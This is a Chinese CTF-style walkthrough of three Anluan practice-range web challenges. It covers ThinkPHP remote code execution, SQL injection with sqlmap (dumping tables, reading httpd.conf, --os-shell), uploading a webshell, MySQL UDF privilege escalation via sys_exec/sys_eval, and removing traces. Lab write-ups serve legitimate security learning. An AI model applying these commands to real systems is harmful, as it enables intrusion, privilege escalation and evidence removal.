【安鸾靶场】实战渗透

文章目录

  • 前言
  • 一、××租房网 (150分)
  • 二、企业网站 (300分)
  • 三、SQL注入进阶 (550分)


前言

最近看到安鸾的靶场有些比较有意思就打了一下午,有一定难度。

一、××租房网 (150分)

http://106.15.50.112:8031/
在这里插入图片描述
刚打开burp就报了thinkphp的代码执行
在这里插入图片描述

直接getshell
在这里插入图片描述
flag:
在这里插入图片描述

二、企业网站 (300分)

http://106.15.50.112:8035/
打开就看到闪灵cms
在这里插入图片描述
开启sqlmapapi:在这里插入图片描述
去用户界面测试:
在这里插入图片描述
这里注册一个验证码直接空就行:
这里有个注入点:

GET /?type=form&S_id=987181647 HTTP/1.1
Host: 106.15.50.112:8035
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: close
Cache-Control: max-age=0

在这里插入图片描述
没跑出来:
在这里插入图片描述
寻找其他注入点:
在这里插入图片描述
那个api跑的慢直接上-r
在这里插入图片描述

在这里插入图片描述
这里有个flag
在这里插入图片描述
sqlmap -r .\test.txt -D scms -T SL_flag -C “flag,id” -dump
在这里插入图片描述

三、SQL注入进阶 (550分)

题目URL:http://106.15.50.112:8023/
提示:flag在服务器根目录

感觉像是sql注入后台上传
在这里插入图片描述
感觉像是伪静态:
在这里插入图片描述
在这里插入图片描述
尝试注入:加*
在这里插入图片描述

在这里插入图片描述
加-dbs参数爆库:
在这里插入图片描述
加–tables爆表:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
找一下后台:
在这里插入图片描述
在这里插入图片描述
这里有upload和images:都可以直接访问
在这里插入图片描述
寻找上传点:
在这里插入图片描述

制作图片马上传:
在这里插入图片描述
尝试修改扩展名:(失败)
在这里插入图片描述
限制了后缀
寻找其他点:
在这里插入图片描述
这里又来sql注入加上刚找的就3个注入点了
使用sqlmap获取一下shell
在这里插入图片描述
直接暴力跑路径:
在这里插入图片描述
失败(应该是不是默认的路径)
读取一下apache的配置找找路径:可能存在的路径
/etc/httpd/httpd.conf - 这是一种常见的位置,特别是在使用Red Hat或CentOS等发行版的系统中。
/etc/apache2/httpd.conf - 在使用Debian或Ubuntu等系统时,配置文件可能会位于此位置。
/usr/local/apache2/conf/httpd.conf - 如果安装apache通常会在/usr/local目录下找到它。
/etc/httpd/conf/httpd.conf - 在某些系统中也可以在此位置找到配置文件。

这里是这个路径直接读取:

sqlmap -r .\test.txt  --file-read="/etc/httpd/conf/httpd.conf"

在这里插入图片描述
在这里插入图片描述
直接–os-shell(目录权限不够)
在这里插入图片描述
用upload试试:(权限不够)在这里插入图片描述
试试其他的目录:

在这里插入图片描述
最后images有权限:
在这里插入图片描述

cat看不到,可能是权限问题:
在这里插入图片描述
在这里插入图片描述
可以通过sqlmap上传自己的shell:
sqlmap 会上传自己的马:
在这里插入图片描述

在这里插入图片描述
选择我们的马上传:
在这里插入图片描述
蚁剑上线:
在这里插入图片描述
这里查看flag发现权限不够:
在这里插入图片描述
这是mysql权限:
尝试suid失败,查看内核版本为5.15.0比较高gcc也没有,mysql的用户可以使用udf提权使用mysql的权限:
这里的密码为空:
在这里插入图片描述

查看可导出文件位置

show variables like '%secure%';
这个mysql>5.1版本

这的secure_file_priv为空可以提权
在这里插入图片描述

show variables like 'plugin%'

在这里插入图片描述
在kali中生成so文件上传到plugin目录
在这里插入图片描述

在这里插入图片描述

添加sys_exec和sys_eval函数

create function sys_exec returns string soname 'mysqludf3.so'
create function sys_eval returns string soname 'mysqludf3.so'

在这里插入图片描述

在这里插入图片描述

清除痕迹:
drop function sys_eval;
drop function sys_exec;
在这里插入图片描述
在这里插入图片描述
删除shell:
在这里插入图片描述
可以自己试试。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/125982.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于SpringBoot的学生选课系统

基于SpringBoot的学生选课系统的设计与实现,前后端分离 开发语言:Java数据库:MySQL技术:SpringBootMyBatisVue工具:IDEA/Ecilpse、Navicat、Maven 前台主页 登录界面 管理员界面 教师界面 学生界面 摘要 学生选课系统…

Javascript文件上传

什么是文件上传 文件上传包含两部分, 一部分是选择文件,包含所有相关的界面交互。一部分是网络传输,通过一个网络请求,将文件的数据携带过去,传递到服务器中,剩下的,在服务器中如何存储&#xf…

排序篇(三)----交换排序

排序篇(三)----交换排序 1.冒泡排序 基本思想: ​ 通过不断地比较相邻的元素,将较大的元素往后移动,从而实现排序的目的。 具体的步骤如下: 从待排序的数组中选择相邻的两个元素进行比较,如果前一个元素大于后一个元素&#…

面试官:听说你很懂SpringMVC,那讲讲其内部对于请求的处理吧!

前言 在当下这个时代,我们每天都会借助浏览器浏览很多内容。但你是否有考虑过当你在浏览器中访问某一个网址时候,这背后都发生了那些事情呢? 事实上,当在浏览器中键入url后,其背后的处理逻辑可大致如下图所示&#x…

跟着播客学英语-Why I use vim ? part one.

why-use-vim-01.png 最近这段时间在学英语,在网上看到有网友推荐可以听英文播客提高听力水平。 正好我自己也有听播客的习惯,只不过几乎都是中文,但现在我已经尝试听了一段时间的英文播客,觉得效果还不错。 大部分都是和 IT 相关的…

特斯拉被称为自动驾驶领域的苹果

特斯拉的自动驾驶技术无疑是居于世界上领先地位的,有人形容特斯拉是自动驾驶汽车领域的苹果。特斯拉发布的Tesla Vision系统只配备了摄像头,不依靠雷达。 这并不是特斯拉唯一和其它对手不同的地方,他们的整个战略都是基于车队和销售产品,而其大多数竞争对手则销售自…

Vue中如何进行分布式路由配置与管理

Vue中的分布式路由配置与管理 随着现代Web应用程序的复杂性不断增加,分布式路由配置和管理成为了一个重要的主题。Vue.js作为一种流行的前端框架,提供了多种方法来管理Vue应用程序的路由。本文将深入探讨在Vue中如何进行分布式路由配置与管理&#xff0…

面试高频手撕算法 - 01背包系列

1. 前言 为什么要专门去搞一下这个背包问题呢 ? 因为作者已经在两场面试中吃了这个亏, 尤其是在面深信服的测开岗的时候, 一面的难度适中, 加上面试官也没为难我, 侥幸让我过了. (以下是一面问题) 二面的时候, 主要问了项目和手撕算法. 当时项目个人觉得面的还不错, 因为本人是…

4.MySql安装配置(更新版)

MySql安装配置 无论计算机是否有安装其他mysql,都不要卸载。 只要确定大版本是8即可,8.0.33 8.0.34 差别不大即可。 MySql下载安装适合电脑配置属性有关,一次性安装成功当然是非常好的,因为卸载步骤是非常麻烦的 如果第一次安装…

网络安全行业真的内卷了吗?网络安全就业必看

前言 有一个特别流行的词语叫做“内卷”: 城市内卷太严重了,年轻人不好找工作;教育内卷;考研内卷;当然还有计算机行业内卷…… 这里的内卷当然不是这个词原本的意思,而是“过剩”“饱和”的替代词。 按照…

docker 安装 logstash

文章目录 Logstash基本语法组成什么是Logstash配置文件:拉去镜像启动镜像 Logstash输入插件(input)1、标准输入(Stdin)2、读取文件(File) Logstash基本语法组成 什么是Logstash logstash是一个数据抽取工具,将数据从一个地方转移…